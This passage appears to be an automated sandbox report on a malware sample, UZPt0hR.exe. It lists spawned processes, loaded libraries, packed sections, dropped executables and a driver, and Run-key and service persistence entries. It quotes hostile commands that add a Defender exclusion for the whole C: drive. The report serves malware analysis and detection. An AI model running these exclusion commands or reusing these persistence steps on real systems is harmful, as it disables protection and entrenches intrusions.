                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe "C:\Users\user\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UZPt0hR.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""Jump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: wtsapi32.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: msi.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: dbghelp.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: dbgcore.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wtsapi32.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: winmm.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dbghelp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dbgcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: apphelp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dlnashext.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wpdshext.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: edputil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: appresolver.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: slc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: sppc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: apphelp.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: windows.storage.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: wldp.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: cryptsp.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: rsaenh.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: cryptbase.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: iphlpapi.dll
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: UZPt0hR.exe | Static file information: File size 1274368 > 1048576
                    Source: UZPt0hR.exe | Static PE information: Raw size of c2 is bigger than: 0x100000 < 0x136000
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C488830 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress, 5_2_000002684C488830
                    Source: initial sample | Static PE information: section where entry point is pointing to: c2
                    Source: UZPt0hR.exe | Static PE information: section name: c0
                    Source: UZPt0hR.exe | Static PE information: section name: c1
                    Source: UZPt0hR.exe | Static PE information: section name: c2
                    Source: tzutil.exe.5.dr | Static PE information: section name: cv0
                    Source: tzutil.exe.5.dr | Static PE information: section name: cv1
                    Source: tzutil.exe.5.dr | Static PE information: section name: cv2
                    Source: w32tm.exe.5.dr | Static PE information: section name: s00
                    Source: w32tm.exe.5.dr | Static PE information: section name: s01
                    Source: w32tm.exe.5.dr | Static PE information: section name: s02
                    Source: K47ZW3T_7928.sys.15.dr | Static PE information: section name: vs0
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_0042C275 push ecx; ret 0_2_0042C288
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_0049B3CD push ecx; ret 0_2_0049B3E0
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_004075BB push ecx; retf 0000h 0_2_004075BC
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_0040A6A2 push eax; ret 0_2_0040A6A3
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_00483B73 push edx; retf 0_2_00483B79
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_004F5B0A push esi; ret 0_2_004F5AE9
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_008586F0 push rax; ret 15_2_00858701
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_00858748 push rax; retn 0085h 15_2_00858759
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_007D2D40 push rcx; iretd 15_2_007D2D43
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_00857E88 push rax; retn 0085h 15_2_00857E89
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FF88AF4FC95 pushad ; retf 19_2_00007FF88AF4FC97
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FF88AF4D2A5 pushad ; iretd 19_2_00007FF88AF4D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FF88B0600BD pushad ; iretd 19_2_00007FF88B0600C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FF88B060B99 push ds; retf 19_2_00007FF88B060B9A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FF88B06ADF8 push E95823A2h; ret 19_2_00007FF88B06AE29
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FF88B06BA7A push E85B2AD7h; ret 19_2_00007FF88B06BAF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FF88B06B950 push E85B2AD7h; ret 19_2_00007FF88B06BAF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FF88B132316 push 8B485F93h; iretd 19_2_00007FF88B13231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FF88AF2D2A5 pushad ; iretd 21_2_00007FF88AF2D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FF88AF2FBB5 pushad ; retf 21_2_00007FF88AF2FBB7
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FF88B04BA3D push E85B2CD7h; ret 21_2_00007FF88B04BAF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FF88B0400BD pushad ; iretd 21_2_00007FF88B0400C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FF88B117CED push D919C3C6h; ret 21_2_00007FF88B117D72
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FF88B112316 push 8B485F95h; iretd 21_2_00007FF88B11231B
                    Source: UZPt0hR.exe | Static PE information: section name: c2 entropy: 7.991367352725959
                    Source: tzutil.exe.5.dr | Static PE information: section name: cv2 entropy: 7.982000050808652
                    Source: w32tm.exe.5.dr | Static PE information: section name: s02 entropy: 7.959351043402205
                    Source: K47ZW3T_7928.sys.15.dr | Static PE information: section name: .text entropy: 7.126561604240753

                    Persistence and Installation Behavior

                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | File created: C:\Windows\Temp\K47ZW3T_7928.sys
                    Source: C:\Windows\System32\svchost.exe | File created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                    Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe

                    Boot Survival

                    Source: C:\Windows\System32\svchost.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\XuH4Y8_7928
